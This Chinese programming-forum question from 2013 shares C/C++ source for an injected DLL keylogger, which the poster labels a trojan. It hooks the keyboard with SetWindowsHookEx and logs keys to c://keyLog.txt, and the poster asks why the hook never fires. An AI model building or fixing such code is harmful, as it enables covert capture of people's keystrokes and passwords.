读书人
栏目

dll注入进程后在dll内部安装钩子函数

发布时间: 2013-01-18 10:22:42 作者: rapoo

dll注入进程后,在dll内部安装钩子函数并截取键盘输入问题
头文件

#include <windows.h>
#ifdef __cplusplus
#define DLLEXPORT extern "C" __declspec (dllexport)
#else
#define DLLEXPORT __declspec (dllexport)
#endif


DLLEXPORT int CALLBACK StartHook();
DLLEXPORT int CALLBACK StopHook();

cpp

#include <stdio.h>
#include "hook_dll.h"


#pragma data_seg("mydata")
FILE *fp = NULL; 
int num = 0;
HHOOK glhHookKey = NULL;
HINSTANCE glhInstance=NULL;

#pragma data_seg()

#pragma comment(linker,"/section:mydata,rws")


LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam);

BOOL APIENTRY DllMain( HINSTANCE hInstance, 
                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
 )
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
glhInstance = hInstance;
StartHook();
MessageBox(NULL,"木马注入","木马",MB_OK);
break;
case DLL_PROCESS_DETACH:
MessageBox(NULL,"木马离去","木马",MB_OK);
    StopHook();
break;
    }
return TRUE;
}

DLLEXPORT int CALLBACK StartHook()
{
int num=0;
if(glhHookKey != NULL)
{
return 0;
}
glhHookKey = SetWindowsHookEx(WH_KEYBOARD,KeyProc,glhInstance,0);
{
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"\nKey Record start.\n");
fclose(fp);
}
else
{
MessageBox(NULL,"open file err",0,0);
StopHook();
return 1;
}
return 0;
}

}
DLLEXPORT int CALLBACK StopHook()
{
BOOL bResult=false;
if(glhHookKey)
{
bResult = UnhookWindowsHookEx(glhHookKey);
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"\nKey Record stop.\n");
fclose(fp);
}
glhHookKey = NULL;
}
return bResult;

}

LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam)
{
if(nCode < 0 || nCode == HC_NOREMOVE)
return ::CallNextHookEx(glhHookKey, nCode, wParam, lParam);

if(lParam & 0x40000000)
{
return ::CallNextHookEx(glhHookKey, nCode, wParam, lParam);
}


char szKey[80];
::GetKeyNameText(lParam, szKey, 80);
MessageBox(NULL,szKey,"木马",MB_OK);
fp = fopen("c://keyLog.txt","at+");
if(fp != NULL)
{
fprintf(fp,"%s",szKey);
fclose(fp);
}
return CallNextHookEx(glhHookKey,nCode,wParam,lParam);
}

我把这个dll注入记事本进程,在注入成功的时候会有MessageBox(NULL,"木马注入","木马",MB_OK);调用,关闭记事本有MessageBox(NULL,"木马离去","木马",MB_OK);调用,但是我输入abc,发现c://keyLog.txt,只有
fprintf(fp,"\nKey Record start.\n");和fprintf(fp,"\nKey Record stop.\n");信息(在starthook()和stophook()里面有输出),这个处理键盘信息的LRESULT CALLBACK KeyProc(int nCode,WPARAM wParam,LPARAM lParam)没有调用,是什么问题啊??是不是安装钩子函数出了什么问题?还是其他的?


[解决办法]

引用:
引用:引用:引用:我也遇到过,钩子无效,不知道怎么回事有解决的办法吗一直没解决

好吧,我推测是因为安装钩子的模块 和 钩子所在的模块 是同一模块的问题。

读书人网 >VC/MFC

热点推荐

触屏版 | 电脑版

读书人网 m.reader8.net